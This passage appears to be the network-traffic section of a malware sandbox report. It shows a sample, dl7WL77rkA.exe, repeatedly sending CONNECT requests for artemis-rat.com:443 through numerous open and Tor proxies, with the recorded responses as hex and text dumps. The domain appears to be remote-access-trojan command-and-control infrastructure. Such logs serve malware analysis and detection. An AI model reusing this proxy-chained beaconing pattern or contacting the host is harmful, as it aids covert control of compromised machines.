                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            947192.168.2.552408103.231.78.36803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.432776928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.820370913 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:13:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            948192.168.2.55202037.187.73.7125823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.433908939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446055889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.572568893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            949192.168.2.552533194.145.209.18731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.446857929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:40.786636114 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.788589001 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:49.795939922 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:01.810477972 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:25.875163078 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            950192.168.2.552409103.190.54.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460732937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            951192.168.2.55255547.243.92.19931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460813046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.770385027 CET38INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            952192.168.2.552583184.72.36.89803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460952997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.633858919 CET344INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 199
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            953192.168.2.552562185.103.101.39100513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.460954905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.979985952 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.545281887 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.407903910 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.241776943 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:19.665225029 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:34.513364077 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
